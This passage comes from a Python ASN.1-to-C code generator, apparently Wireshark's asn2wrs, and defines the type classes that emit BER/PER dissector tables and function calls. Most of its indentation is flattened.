ectx.tag_def = self.tag_def.dfl_tag
ectx.eth_reg_module(self)
self.body.to_eth(ectx)
class Module_Body (Node):
def to_python (self, ctx):
# XXX handle exports, imports.
l = [x.to_python (ctx) for x in self.assign_list]
l = [a for a in l if a != '']
return "\n".join (l)
def to_eth(self, ectx):
# Exports
ectx.eth_exports(self.exports)
# Imports
for i in self.imports:
mod = i.module.val
proto = ectx.conform.use_item('MODULE', mod, val_dflt=mod)
ectx.eth_module_dep_add(ectx.Module(), mod)
for s in i.symbol_list:
if isinstance(s, Type_Ref):
ectx.eth_import_type(s.val, mod, proto)
elif isinstance(s, Value_Ref):
ectx.eth_import_value(s.val, mod, proto)
elif isinstance(s, Class_Ref):
ectx.eth_import_class(s.val, mod, proto)
else:
msg = 'Unknown kind of imported symbol %s from %s' % (str(s), mod)
warnings.warn_explicit(msg, UserWarning, '', 0)
# AssignmentList
for a in self.assign_list:
a.eth_reg('', ectx)
class Default_Tags (Node):
def to_python (self, ctx): # not to be used directly
assert (0)
# XXX should just calculate dependencies as we go along.
def calc_dependencies (node, dep_dict, trace = 0):
    if not hasattr (node, '__dict__'):
        if trace: print("#returning, node=", node)
        return
    if isinstance (node, Type_Ref):
        dep_dict[node.val] = 1
        if trace: print("#Setting", node.val)
        return
    for (a, val) in list(node.__dict__.items ()):
        if trace: print("# Testing node ", node, "attr", a, " val", val)
        if a[0] == '_':
            continue
        elif isinstance (val, Node):
            calc_dependencies (val, dep_dict, trace)
        elif isinstance (val, list):
            for v in val:
                calc_dependencies (v, dep_dict, trace)
class Type_Assign (Node):
def __init__ (self, *args, **kw):
Node.__init__ (self, *args, **kw)
if isinstance (self.val, Tag): # XXX replace with generalized get_typ_ignoring_tag (no-op for Node, override in Tag)
to_test = self.val.typ
else:
to_test = self.val
if isinstance (to_test, SequenceType):
to_test.sequence_name = self.name.name
def to_python (self, ctx):
dep_dict = {}
calc_dependencies (self.val, dep_dict, 0)
depend_list = list(dep_dict.keys ())
return ctx.register_assignment (self.name.name,
self.val.to_python (ctx),
depend_list)
class PyQuote (Node):
def to_python (self, ctx):
return ctx.register_pyquote (self.val)
#--- Type_Ref -----------------------------------------------------------------
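# A reference to a type defined elsewhere (possibly imported from another
# module).  Dissection is delegated to the referenced type's generated
# dissect_<proto>_<name>() function; only a PER size constraint forces a
# wrapper function of its own (see tr_need_own_fn).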
class Type_Ref (Type):
def to_python (self, ctx):
return self.val
def eth_reg_sub(self, ident, ectx):
ectx.eth_dep_add(ident, self.val)
def eth_tname(self):
if self.HasSizeConstraint():
return asn2c(self.val) + '_' + self.constr.eth_constrname()
else:
return asn2c(self.val)
def tr_need_own_fn(self, ectx):
return ectx.Per() and self.HasSizeConstraint()
def fld_obj_repr(self, ectx):
return self.val
def get_components(self, ectx):
if self.val not in ectx.type or ectx.type[self.val]['import']:
msg = "Can not get COMPONENTS OF %s which is imported type" % (self.val)
warnings.warn_explicit(msg, UserWarning, '', 0)
return []
else:
return ectx.type[self.val]['val'].get_components(ectx)
def GetTTag(self, ectx):
#print "GetTTag(%s)\n" % self.val;
if (ectx.type[self.val]['import']):
if 'ttag' not in ectx.type[self.val]:
ttag = ectx.get_ttag_from_all(self.val, ectx.type[self.val]['import'])
if not ttag and not ectx.conform.check_item('IMPORT_TAG', self.val):
msg = 'Missing tag information for imported type %s from %s (%s)' % (self.val, ectx.type[self.val]['import'], ectx.type[self.val]['proto'])
warnings.warn_explicit(msg, UserWarning, '', 0)
ttag = ('-1/*imported*/', '-1/*imported*/')
ectx.type[self.val]['ttag'] = ectx.conform.use_item('IMPORT_TAG', self.val, val_dflt=ttag)
return ectx.type[self.val]['ttag']
else:
return ectx.type[self.val]['val'].GetTag(ectx)
def IndetermTag(self, ectx):
if (ectx.type[self.val]['import']):
return False
else:
return ectx.type[self.val]['val'].IndetermTag(ectx)
def eth_type_default_pars(self, ectx, tname):
if tname:
pars = Type.eth_type_default_pars(self, ectx, tname)
else:
pars = {}
t = ectx.type[self.val]['ethname']
pars['TYPE_REF_PROTO'] = ectx.eth_type[t]['proto']
pars['TYPE_REF_TNAME'] = t
pars['TYPE_REF_FN'] = 'dissect_%(TYPE_REF_PROTO)s_%(TYPE_REF_TNAME)s'
if self.HasSizeConstraint():
(pars['MIN_VAL'], pars['MAX_VAL'], pars['EXT']) = self.eth_get_size_constr(ectx)
return pars
def eth_type_default_body(self, ectx, tname):
if (ectx.Ber()):
body = ectx.eth_fn_call('%(TYPE_REF_FN)s', ret='offset',
par=(('%(IMPLICIT_TAG)s', '%(TVB)s', '%(OFFSET)s', '%(ACTX)s', '%(TREE)s', '%(HF_INDEX)s'),))
elif (ectx.Per()):
if self.HasSizeConstraint():
body = ectx.eth_fn_call('dissect_%(ER)s_size_constrained_type', ret='offset',
par=(('%(TVB)s', '%(OFFSET)s', '%(ACTX)s', '%(TREE)s', '%(HF_INDEX)s', '%(TYPE_REF_FN)s',),
('"%(TYPE_REF_TNAME)s"', '%(MIN_VAL)s', '%(MAX_VAL)s', '%(EXT)s',),))
else:
body = ectx.eth_fn_call('%(TYPE_REF_FN)s', ret='offset',
par=(('%(TVB)s', '%(OFFSET)s', '%(ACTX)s', '%(TREE)s', '%(HF_INDEX)s'),))
else:
body = '#error Can not decode %s' % (tname)
return body
#--- SelectionType ------------------------------------------------------------
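# ASN.1 selection type ("identifier < Choice"): dissected as the selected
# alternative of the referenced CHOICE type.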
class SelectionType (Type):
def to_python (self, ctx):
return self.val
def sel_of_typeref(self):
return self.typ.type == 'Type_Ref'
def eth_reg_sub(self, ident, ectx):
if not self.sel_of_typeref():
self.seltype = ''
return
self.seltype = ectx.eth_sel_req(self.typ.val, self.sel)
ectx.eth_dep_add(ident, self.seltype)
def eth_ftype(self, ectx):
(ftype, display) = ('FT_NONE', 'BASE_NONE')
if self.sel_of_typeref() and not ectx.type[self.seltype]['import']:
(ftype, display) = ectx.type[self.typ.val]['val'].eth_ftype_sel(self.sel, ectx)
return (ftype, display)
def GetTTag(self, ectx):
#print "GetTTag(%s)\n" % self.seltype;
if (ectx.type[self.seltype]['import']):
if 'ttag' not in ectx.type[self.seltype]:
if not ectx.conform.check_item('IMPORT_TAG', self.seltype):
msg = 'Missing tag information for imported type %s from %s (%s)' % (self.seltype, ectx.type[self.seltype]['import'], ectx.type[self.seltype]['proto'])
warnings.warn_explicit(msg, UserWarning, '', 0)
ectx.type[self.seltype]['ttag'] = ectx.conform.use_item('IMPORT_TAG', self.seltype, val_dflt=('-1 /*imported*/', '-1 /*imported*/'))
return ectx.type[self.seltype]['ttag']
else:
return ectx.type[self.typ.val]['val'].GetTTagSel(self.sel, ectx)
def eth_type_default_pars(self, ectx, tname):
pars = Type.eth_type_default_pars(self, ectx, tname)
if self.sel_of_typeref():
t = ectx.type[self.seltype]['ethname']
pars['TYPE_REF_PROTO'] = ectx.eth_type[t]['proto']
pars['TYPE_REF_TNAME'] = t
pars['TYPE_REF_FN'] = 'dissect_%(TYPE_REF_PROTO)s_%(TYPE_REF_TNAME)s'
return pars
def eth_type_default_body(self, ectx, tname):
if not self.sel_of_typeref():
body = '#error Can not decode %s' % (tname)
elif (ectx.Ber()):
body = ectx.eth_fn_call('%(TYPE_REF_FN)s', ret='offset',
par=(('%(IMPLICIT_TAG)s', '%(TVB)s', '%(OFFSET)s', '%(ACTX)s', '%(TREE)s', '%(HF_INDEX)s'),))
elif (ectx.Per()):
body = ectx.eth_fn_call('%(TYPE_REF_FN)s', ret='offset',
par=(('%(TVB)s', '%(OFFSET)s', '%(ACTX)s', '%(TREE)s', '%(HF_INDEX)s'),))
else:
body = '#error Can not decode %s' % (tname)
return body
#--- TaggedType -----------------------------------------------------------------
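# A type carrying an explicit tag prefix ("[class number] Type").  The
# underlying type is registered under <ident>/UNTAG_TYPE_NAME, and BER
# dissection wraps it in dissect_<ER>_tagged_type(); PER has no tags, so
# only a BER body is generated here.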
class TaggedType (Type):
def eth_tname(self):
tn = ''
for i in range(self.tstrip, len(self.val.tags)):
tn += self.val.tags[i].eth_tname()
tn += '_'
tn += self.val.eth_tname()
return tn
def eth_set_val_name(self, ident, val_name, ectx):
#print "TaggedType::eth_set_val_name(): ident=%s, val_name=%s" % (ident, val_name)
self.val_name = val_name
ectx.eth_dep_add(ident, self.val_name)
def eth_reg_sub(self, ident, ectx):
self.val_name = ident + '/' + UNTAG_TYPE_NAME
self.val.eth_reg(self.val_name, ectx, tstrip=self.tstrip+1, tagflag=True, parent=ident)
def GetTTag(self, ectx):
#print "GetTTag(%s)\n" % self.seltype;
return self.GetTag(ectx)
def eth_ftype(self, ectx):
return self.val.eth_ftype(ectx)
def eth_type_default_pars(self, ectx, tname):
pars = Type.eth_type_default_pars(self, ectx, tname)
t = ectx.type[self.val_name]['ethname']
pars['TYPE_REF_PROTO'] = ectx.eth_type[t]['proto']
pars['TYPE_REF_TNAME'] = t
pars['TYPE_REF_FN'] = 'dissect_%(TYPE_REF_PROTO)s_%(TYPE_REF_TNAME)s'
(pars['TAG_CLS'], pars['TAG_TAG']) = self.GetTag(ectx)
if self.HasImplicitTag(ectx):
pars['TAG_IMPL'] = 'TRUE'
else:
pars['TAG_IMPL'] = 'FALSE'
return pars
def eth_type_default_body(self, ectx, tname):
if (ectx.Ber()):
body = ectx.eth_fn_call('dissect_%(ER)s_tagged_type', ret='offset',
par=(('%(IMPLICIT_TAG)s', '%(ACTX)s', '%(TREE)s', '%(TVB)s', '%(OFFSET)s'),
('%(HF_INDEX)s', '%(TAG_CLS)s', '%(TAG_TAG)s', '%(TAG_IMPL)s', '%(TYPE_REF_FN)s',),))
else:
body = '#error Can not decode %s' % (tname)
return body
#--- SqType -----------------------------------------------------------
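# Common base for the SEQUENCE/SET(-OF) types: out_item() renders one row of
# the generated BER/PER component table (field pointer, tag or extension
# marker, optionality flags, and the component's dissector function).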
class SqType (Type):
def out_item(self, f, val, optional, ext, ectx):
if (val.eth_omit_field()):
t = ectx.type[val.ident]['ethname']
fullname = ectx.dummy_eag_field
else:
ef = ectx.field[f]['ethname']
t = ectx.eth_hf[ef]['ethtype']
fullname = ectx.eth_hf[ef]['fullname']
if (ectx.Ber()):
#print "optional=%s, e.val.HasOwnTag()=%s, e.val.IndetermTag()=%s" % (str(e.optional), str(e.val.HasOwnTag()), str(e.val.IndetermTag(ectx)))
#print val.str_depth(1)
opt = ''
if (optional):
opt = 'BER_FLAGS_OPTIONAL'
if (not val.HasOwnTag()):
if (opt): opt += '|'
opt += 'BER_FLAGS_NOOWNTAG'
elif (val.HasImplicitTag(ectx)):
if (opt): opt += '|'
opt += 'BER_FLAGS_IMPLTAG'
if (val.IndetermTag(ectx)):
if (opt): opt += '|'
opt += 'BER_FLAGS_NOTCHKTAG'
if (not opt): opt = '0'
else:
if optional:
opt = 'ASN1_OPTIONAL'
else:
opt = 'ASN1_NOT_OPTIONAL'
if (ectx.Ber()):
(tc, tn) = val.GetTag(ectx)
out = ' { %-24s, %-13s, %s, %s, dissect_%s_%s },\n' \
% ('&'+fullname, tc, tn, opt, ectx.eth_type[t]['proto'], t)
elif (ectx.Per()):
out = ' { %-24s, %-23s, %-17s, dissect_%s_%s },\n' \
% ('&'+fullname, ext, opt, ectx.eth_type[t]['proto'], t)
else:
out = ''
return out
#--- SeqType -----------------------------------------------------------
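# Base class for SEQUENCE and SET: handles COMPONENTS OF expansion, PER
# extension addition groups, AUTOMATIC tagging, and registration of the
# individual components.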
class SeqType (SqType):
def all_components(self):
lst = self.elt_list[:]
if hasattr(self, 'ext_list'):
lst.extend(self.ext_list)
if hasattr(self, 'elt_list2'):
lst.extend(self.elt_list2)
return lst
def need_components(self):
lst = self.all_components()
for e in (lst):
if e.type == 'components_of':
return True
return False
def expand_components(self, ectx):
while self.need_components():
for i in range(len(self.elt_list)):
if self.elt_list[i].type == 'components_of':
comp = self.elt_list[i].typ.get_components(ectx)
self.elt_list[i:i+1] = comp
break
if hasattr(self, 'ext_list'):
for i in range(len(self.ext_list)):
if self.ext_list[i].type == 'components_of':
comp = self.ext_list[i].typ.get_components(ectx)
self.ext_list[i:i+1] = comp
break
if hasattr(self, 'elt_list2'):
for i in range(len(self.elt_list2)):
if self.elt_list2[i].type == 'components_of':
comp = self.elt_list2[i].typ.get_components(ectx)
self.elt_list2[i:i+1] = comp
break
def get_components(self, ectx):
lst = self.elt_list[:]
if hasattr(self, 'elt_list2'):
lst.extend(self.elt_list2)
return lst
def eth_reg_sub(self, ident, ectx, components_available=False):
# check if autotag is required
autotag = False
if (ectx.NeedTags() and (ectx.tag_def == 'AUTOMATIC')):
autotag = True
            lst = self.all_components()
            for e in (lst):
                if e.val.HasOwnTag():
                    autotag = False
                    break
# expand COMPONENTS OF
if self.need_components():
if components_available:
self.expand_components(ectx)
else:
ectx.eth_comp_req(ident)
return
# extension addition groups
if hasattr(self, 'ext_list'):
if (ectx.Per()): # add names
eag_num = 1
for e in (self.ext_list):
if isinstance(e.val, ExtensionAdditionGroup):
e.val.parent_ident = ident
e.val.parent_tname = ectx.type[ident]['tname']
if (e.val.ver):
e.val.SetName("eag_v%s" % (e.val.ver))
else:
e.val.SetName("eag_%d" % (eag_num))
                            eag_num += 1
else: # expand
new_ext_list = []
for e in (self.ext_list):
if isinstance(e.val, ExtensionAdditionGroup):
new_ext_list.extend(e.val.elt_list)
else:
new_ext_list.append(e)
self.ext_list = new_ext_list
# do autotag
if autotag:
atag = 0
for e in (self.elt_list):
e.val.AddTag(Tag(cls = 'CONTEXT', num = str(atag), mode = 'IMPLICIT'))
atag += 1
if autotag and hasattr(self, 'elt_list2'):
for e in (self.elt_list2):
e.val.AddTag(Tag(cls = 'CONTEXT', num = str(atag), mode = 'IMPLICIT'))
atag += 1
if autotag and hasattr(self, 'ext_list'):
for e in (self.ext_list):
e.val.AddTag(Tag(cls = 'CONTEXT', num = str(atag), mode = 'IMPLICIT'))
atag += 1
# register components
for e in (self.elt_list):
e.val.eth_reg(ident, ectx, tstrip=1, parent=ident)
if hasattr(self, 'ext_list'):
for e in (self.ext_list):
e.val.eth_reg(ident, ectx, tstrip=1, parent=ident)
if hasattr(self, 'elt_list2'):
for e in (self.elt_list2):
e.val.eth_reg(ident, ectx, tstrip=1, parent=ident)
def eth_type_default_table(self, ectx, tname):
#print "eth_type_default_table(tname='%s')" % (tname)
fname = ectx.eth_type[tname]['ref'][0]
table = "static const %(ER)s_sequence_t %(TABLE)s[] = {\n"
if hasattr(self, 'ext_list'):
ext = 'ASN1_EXTENSION_ROOT'
else:
ext = 'ASN1_NO_EXTENSIONS'
empty_ext_flag = '0'
if (len(self.elt_list)==0) and hasattr(self, 'ext_list') and (len(self.ext_list)==0) and (not hasattr(self, 'elt_list2') or (len(self.elt_list2)==0)):
empty_ext_flag = ext
for e in (self.elt_list):
f = fname + '/' + e.val.name
table += self.out_item(f, e.val, e.optional, ext, ectx)
if hasattr(self, 'ext_list'):
for e in (self.ext_list):
f = fname + '/' + e.val.name
table += self.out_item(f, e.val, e.optional, 'ASN1_NOT_EXTENSION_ROOT', ectx)
if hasattr(self, 'elt_list2'):
for e in (self.elt_list2):
f = fname + '/' + e.val.name
table += self.out_item(f, e.val, e.optional, ext, ectx)
if (ectx.Ber()):
table += " { NULL, 0, 0, 0, NULL }\n};\n"
else:
table += " { NULL, %s, 0, NULL }\n};\n" % (empty_ext_flag)
return table
#--- SeqOfType -----------------------------------------------------------
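# Base class for SEQUENCE OF / SET OF: the generated component table has
# exactly one row, describing the repeated item.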
class SeqOfType (SqType):
def eth_type_default_table(self, ectx, tname):
#print "eth_type_default_table(tname='%s')" % (tname)
fname = ectx.eth_type[tname]['ref'][0]
if self.val.IsNamed ():
f = fname + '/' + self.val.name
else:
f = fname + '/' + ITEM_FIELD_NAME
table = "static const %(ER)s_sequence_t %(TABLE)s[1] = {\n"
table += self.out_item(f, self.val, False, 'ASN1_NO_EXTENSIONS', ectx)
table += "};\n"
return table
#--- SequenceOfType -----------------------------------------------------------
class SequenceOfType (SeqOfType):
def to_python (self, ctx):
# name, tag (None for no tag, EXPLICIT() for explicit), typ)
# or '' + (1,) for optional
sizestr = ''
        if self.size_constr is not None:
print("#Ignoring size constraint:", self.size_constr.subtype)
return "%sasn1.SEQUENCE_OF (%s%s)" % (ctx.spaces (),
self.val.to_python (ctx),
sizestr)
def eth_reg_sub(self, ident, ectx):
itmnm = ident
if not self.val.IsNamed ():
itmnm += '/' + ITEM_FIELD_NAME
self.val.eth_reg(itmnm, ectx, tstrip=1, idx='[##]', parent=ident)
def eth_tname(self):
if self.val.type != 'Type_Ref':
return '#' + self.type + '_' + str(id(self))
if not self.HasConstraint():
return "SEQUENCE_OF_" + self.val.eth_tname()
elif self.constr.IsSize():
return 'SEQUENCE_' + self.constr.eth_constrname() + '_OF_' + self.val.eth_tname()
else:
return '#' + self.type + '_' + str(id(self))
def eth_ftype(self, ectx):
return ('FT_UINT32', 'BASE_DEC')
def eth_need_tree(self):
return True
def GetTTag(self, ectx):
return ('BER_CLASS_UNI', 'BER_UNI_TAG_SEQUENCE')
def eth_type_default_pars(self, ectx, tname):
pars = Type.eth_type_default_pars(self, ectx, tname)
(pars['MIN_VAL'], pars['MAX_VAL'], pars['EXT']) = self.eth_get_size_constr(ectx)
pars['TABLE'] = '%(PROTOP)s%(TNAME)s_sequence_of'
return pars
def eth_type_default_body(self, ectx, tname):
if (ectx.Ber()):
if (ectx.constraints_check and self.HasSizeConstraint()):
body = ectx.eth_fn_call('dissect_%(ER)s_constrained_sequence_of', ret='offset',
par=(('%(IMPLICIT_TAG)s', '%(ACTX)s', '%(TREE)s', '%(TVB)s', '%(OFFSET)s'),
('%(MIN_VAL)s', '%(MAX_VAL)s', '%(TABLE)s', '%(HF_INDEX)s', '%(ETT_INDEX)s',),))
else:
body = ectx.eth_fn_call('dissect_%(ER)s_sequence_of', ret='offset',
par=(('%(IMPLICIT_TAG)s', '%(ACTX)s', '%(TREE)s', '%(TVB)s', '%(OFFSET)s'),
('%(TABLE)s', '%(HF_INDEX)s', '%(ETT_INDEX)s',),))
elif (ectx.Per() and not self.HasConstraint()):
body = ectx.eth_fn_call('dissect_%(ER)s_sequence_of', ret='offset',
par=(('%(TVB)s', '%(OFFSET)s', '%(ACTX)s', '%(TREE)s', '%(HF_INDEX)s'),
('%(ETT_INDEX)s', '%(TABLE)s',),))
elif (ectx.Per() and self.constr.type == 'Size'):
body = ectx.eth_fn_call('dissect_%(ER)s_constrained_sequence_of', ret='offset',
par=(('%(TVB)s', '%(OFFSET)s', '%(ACTX)s', '%(TREE)s', '%(HF_INDEX)s'),
('%(ETT_INDEX)s', '%(TABLE)s',),
('%(MIN_VAL)s', '%(MAX_VAL)s','%(EXT)s'),))
else:
body = '#error Can not decode %s' % (tname)
return body
#--- SetOfType ----------------------------------------------------------------
class SetOfType (SeqOfType):
def eth_reg_sub(self, ident, ectx):
itmnm = ident
if not self.val.IsNamed ():
itmnm += '/' + ITEM_FIELD_NAME
self.val.eth_reg(itmnm, ectx, tstrip=1, idx='(##)', parent=ident)
def eth_tname(self):
if self.val.type != 'Type_Ref':
return '#' + self.type + '_' + str(id(self))
if not self.HasConstraint():
return "SET_OF_" + self.val.eth_tname()
elif self.constr.IsSize():
return 'SET_' + self.constr.eth_constrname() + '_OF_' + self.val.eth_tname()
else:
return '#' + self.type + '_' + str(id(self))
def eth_ftype(self, ectx):
return ('FT_UINT32', 'BASE_DEC')
def eth_need_tree(self):
return True
def GetTTag(self, ectx):
return ('BER_CLASS_UNI', 'BER_UNI_TAG_SET')
def eth_type_default_pars(self, ectx, tname):
pars = Type.eth_type_default_pars(self, ectx, tname)
(pars['MIN_VAL'], pars['MAX_VAL'], pars['EXT']) = self.eth_get_size_constr(ectx)
pars['TABLE'] = '%(PROTOP)s%(TNAME)s_set_of'
return pars
def eth_type_default_body(self, ectx, tname):
if (ectx.Ber()):
if (ectx.constraints_check and self.HasSizeConstraint()):
body = ectx.eth_fn_call('dissect_%(ER)s_constrained_set_of', ret='offset',
par=(('%(IMPLICIT_TAG)s', '%(ACTX)s', '%(TREE)s', '%(TVB)s', '%(OFFSET)s'),
('%(MIN_VAL)s', '%(MAX_VAL)s', '%(TABLE)s', '%(HF_INDEX)s', '%(ETT_INDEX)s',),))
else:
body = ectx.eth_fn_call('dissect_%(ER)s_set_of', ret='offset',
par=(('%(IMPLICIT_TAG)s', '%(ACTX)s', '%(TREE)s', '%(TVB)s', '%(OFFSET)s'),
('%(TABLE)s', '%(HF_INDEX)s', '%(ETT_INDEX)s',),))
elif (ectx.Per() and not self.HasConstraint()):
body = ectx.eth_fn_call('dissect_%(ER)s_set_of', ret='offset',
par=(('%(TVB)s', '%(OFFSET)s', '%(ACTX)s', '%(TREE)s', '%(HF_INDEX)s'),
('%(ETT_INDEX)s', '%(TABLE)s',),))
elif (ectx.Per() and self.constr.type == 'Size'):
body = ectx.eth_fn_call('dissect_%(ER)s_constrained_set_of', ret='offset',
par=(('%(TVB)s', '%(OFFSET)s', '%(ACTX)s', '%(TREE)s', '%(HF_INDEX)s'),
('%(ETT_INDEX)s', '%(TABLE)s',),
('%(MIN_VAL)s', '%(MAX_VAL)s','%(EXT)s',),))
else:
body = '#error Can not decode %s' % (tname)
return body
def mk_tag_str (ctx, cls, typ, num):
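    # e.g. mk_tag_str(ctx, 'CONTEXT', 'IMPLICIT', '0') -> "asn1.IMPLICIT(0,cls=asn1.CONTEXT_FLAG)"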
# XXX should do conversion to int earlier!
val = int (num)
typ = typ.upper()
if typ == 'DEFAULT':
typ = ctx.tags_def
    return 'asn1.%s(%d,cls=asn1.%s_FLAG)' % (typ, val, cls) # XXX still need
#--- SequenceType -------------------------------------------------------------
class SequenceType (SeqType):
def to_python (self, ctx):
# name, tag (None for no tag, EXPLICIT() for explicit), typ)
# or '' + (1,) for optional
# XXX should also collect names for SEQUENCE inside SEQUENCE or
# CHOICE or SEQUENCE_OF (where should the SEQUENCE_OF name come
# from? for others, element or arm name would be fine)
seq_name = getattr (self, 'sequence_name', None)
        if seq_name is None:
            seq_name = 'None'
        else:
            seq_name = "'" + seq_name + "'"
        if 'ext_list' in self.__dict__:
            return "%sasn1.SEQUENCE ([%s], ext=[%s], seq_name = %s)" % (ctx.spaces (),
                                                                        self.elts_to_py (self.elt_list, ctx),
                                                                        self.elts_to_py (self.ext_list, ctx), seq_name)
        else:
            return "%sasn1.SEQUENCE ([%s], seq_name = %s)" % (ctx.spaces (),
                                                              self.elts_to_py (self.elt_list, ctx), seq_name)
    def elts_to_py (self, elts, ctx):
# we have elt_type, val= named_type, maybe default=, optional=
# named_type node: either ident = or typ =
# need to dismember these in order to generate Python output syntax.
ctx.indent ()
def elt_to_py (e):
assert (e.type == 'elt_type')
nt = e.val
optflag = e.optional
#assert (not hasattr (e, 'default')) # XXX add support for DEFAULT!
assert (nt.type == 'named_type')
tagstr = 'None'
identstr = nt.ident
if hasattr (nt.typ, 'type') and nt.typ.type == 'tag': # ugh
tagstr = mk_tag_str (ctx,nt.typ.tag.cls,
nt.typ.tag.tag_typ,nt.typ.tag.num)
nt = nt.typ
return "('%s',%s,%s,%d)" % (identstr, tagstr,
nt.typ.to_python (ctx), optflag)
indentstr = ",\n" + ctx.spaces ()
        rv = indentstr.join ([elt_to_py (e) for e in elts])
ctx.outdent ()
return rv
def eth_need_tree(self):
return True
def GetTTag(self, ectx):
return ('BER_CLASS_UNI', 'BER_UNI_TAG_SEQUENCE')
def eth_type_default_pars(self, ectx, tname):
pars = Type.eth_type_default_pars(self, ectx, tname)
pars['TABLE'] = '%(PROTOP)s%(TNAME)s_sequence'
return pars
def eth_type_default_body(self, ectx, tname):
if (ectx.Ber()):
body = ectx.eth_fn_call('dissect_%(ER)s_sequence', ret='offset',
par=(('%(IMPLICIT_TAG)s', '%(ACTX)s', '%(TREE)s', '%(TVB)s', '%(OFFSET)s'),
('%(TABLE)s', '%(HF_INDEX)s', '%(ETT_INDEX)s',),))
elif (ectx.Per()):
body = ectx.eth_fn_call('dissect_%(ER)s_sequence', ret='offset',
par=(('%(TVB)s', '%(OFFSET)s', '%(ACTX)s', '%(TREE)s', '%(HF_INDEX)s'),
('%(ETT_INDEX)s', '%(TABLE)s',),))
else:
body = '#error Can not decode %s' % (tname)
return body
#--- ExtensionAdditionGroup ---------------------------------------------------
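# A PER "[[ ... ]]" extension addition group: emitted as a dummy (omitted)
# field and dissected via dissect_<ER>_sequence_eag(); only meaningful for
# PER, so no BER body is generated.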
class ExtensionAdditionGroup (SeqType):
def __init__(self,*args, **kw) :
self.parent_ident = None
self.parent_tname = None
SeqType.__init__ (self,*args, **kw)
def eth_omit_field(self):
return True
def eth_tname(self):
if (self.parent_tname and self.IsNamed()):
return self.parent_tname + "_" + self.name
else:
return SeqType.eth_tname(self)
def eth_reg_sub(self, ident, ectx):
ectx.eth_dummy_eag_field_required()
ectx.eth_dep_add(self.parent_ident, ident)
SeqType.eth_reg_sub(self, ident, ectx)
def eth_type_default_pars(self, ectx, tname):
pars = Type.eth_type_default_pars(self, ectx, tname)
pars['TABLE'] = '%(PROTOP)s%(TNAME)s_sequence'
return pars
def eth_type_default_body(self, ectx, tname):
if (ectx.Per()):
body = ectx.eth_fn_call('dissect_%(ER)s_sequence_eag', ret='offset',
par=(('%(TVB)s', '%(OFFSET)s', '%(ACTX)s', '%(TREE)s', '%(TABLE)s',),))
else:
body = '#error Can not decode %s' % (tname)
return body
#--- SetType ------------------------------------------------------------------
class SetType (SeqType):
def eth_need_tree(self):
return True
def GetTTag(self, ectx):
return ('BER_CLASS_UNI', 'BER_UNI_TAG_SET')
def eth_type_default_pars(self, ectx, tname):
pars = Type.eth_type_default_pars(self, ectx, tname)
pars['TABLE'] = '%(PROTOP)s%(TNAME)s_set'
return pars
def eth_type_default_body(self, ectx, tname):
if (ectx.Ber()):
body = ectx.eth_fn_call('dissect_%(ER)s_set', ret='offset',
par=(('%(IMPLICIT_TAG)s', '%(ACTX)s', '%(TREE)s', '%(TVB)s', '%(OFFSET)s'),
('%(TABLE)s', '%(HF_INDEX)s', '%(ETT_INDEX)s',),))
elif (ectx.Per()):
body = ectx.eth_fn_call('dissect_%(ER)s_set', ret='offset',
par=(('%(TVB)s', '%(OFFSET)s', '%(ACTX)s', '%(TREE)s', '%(HF_INDEX)s'),
('%(ETT_INDEX)s', '%(TABLE)s',),))
else:
body = '#error Can not decode %s' % (tname)
return body
#--- ChoiceType ---------------------------------------------------------------
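# CHOICE: generates a value_string of the alternatives plus a choice table;
# detect_tagval() decides whether the BER tag numbers (rather than positional
# indexes) can serve as the discriminating values.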
class ChoiceType (Type):
def to_python (self, ctx):
# name, tag (None for no tag, EXPLICIT() for explicit), typ)
# or '' + (1,) for optional
if 'ext_list' in self.__dict__:
return "%sasn1.CHOICE ([%s], ext=[%s])" % (ctx.spaces (),
self.elts_to_py (self.elt_list, ctx),
self.elts_to_py (self.ext_list, ctx))
else:
return "%sasn1.CHOICE ([%s])" % (ctx.spaces (), self.elts_to_py (self.elt_list, ctx))
    def elts_to_py (self, elts, ctx):
ctx.indent ()
def elt_to_py (nt):
assert (nt.type == 'named_type')
tagstr = 'None'
if hasattr (nt, 'ident'):
identstr = nt.ident
else:
if hasattr (nt.typ, 'val'):
identstr = nt.typ.val # XXX, making up name
elif hasattr (nt.typ, 'name'):
identstr = nt.typ.name
else:
identstr = ctx.make_new_name ()
if hasattr (nt.typ, 'type') and nt.typ.type == 'tag': # ugh
tagstr = mk_tag_str (ctx,nt.typ.tag.cls,
nt.typ.tag.tag_typ,nt.typ.tag.num)
nt = nt.typ
return "('%s',%s,%s)" % (identstr, tagstr,
nt.typ.to_python (ctx))
indentstr = ",\n" + ctx.spaces ()
        rv = indentstr.join ([elt_to_py (e) for e in elts])
ctx.outdent ()
return rv
def eth_reg_sub(self, ident, ectx):
#print "eth_reg_sub(ident='%s')" % (ident)
# check if autotag is required
autotag = False
if (ectx.NeedTags() and (ectx.tag_def == 'AUTOMATIC')):
autotag = True
            for e in (self.elt_list):
                if e.HasOwnTag():
                    autotag = False
                    break
        if autotag and hasattr(self, 'ext_list'):
            for e in (self.ext_list):
                if e.HasOwnTag():
                    autotag = False
                    break
# do autotag
if autotag:
atag = 0
for e in (self.elt_list):
e.AddTag(Tag(cls = 'CONTEXT', num = str(atag), mode = 'IMPLICIT'))
atag += 1
if autotag and hasattr(self, 'ext_list'):
for e in (self.ext_list):
e.AddTag(Tag(cls = 'CONTEXT', num = str(atag), mode = 'IMPLICIT'))
atag += 1
for e in (self.elt_list):
e.eth_reg(ident, ectx, tstrip=1, parent=ident)
if ectx.conform.check_item('EXPORTS', ident + '.' + e.name):
ectx.eth_sel_req(ident, e.name)
if hasattr(self, 'ext_list'):
for e in (self.ext_list):
e.eth_reg(ident, ectx, tstrip=1, parent=ident)
if ectx.conform.check_item('EXPORTS', ident + '.' + e.name):
ectx.eth_sel_req(ident, e.name)
def sel_item(self, ident, sel, ectx):
lst = self.elt_list[:]
if hasattr(self, 'ext_list'):
lst.extend(self.ext_list)
ee = None
        for e in (lst):
if e.IsNamed() and (e.name == sel):
ee = e
break
if not ee:
print("#CHOICE %s does not contain item %s" % (ident, sel))
return ee
def sel_req(self, ident, sel, ectx):
#print "sel_req(ident='%s', sel=%s)\n%s" % (ident, sel, str(self))
ee = self.sel_item(ident, sel, ectx)
if ee:
ee.eth_reg(ident, ectx, tstrip=0, selflag=True)
def eth_ftype(self, ectx):
return ('FT_UINT32', 'BASE_DEC')
def eth_ftype_sel(self, sel, ectx):
ee = self.sel_item('', sel, ectx)
if ee:
return ee.eth_ftype(ectx)
else:
return ('FT_NONE', 'BASE_NONE')
def eth_strings(self):
return '$$'
def eth_need_tree(self):
return True
def eth_has_vals(self):
return True
def GetTTag(self, ectx):
lst = self.elt_list
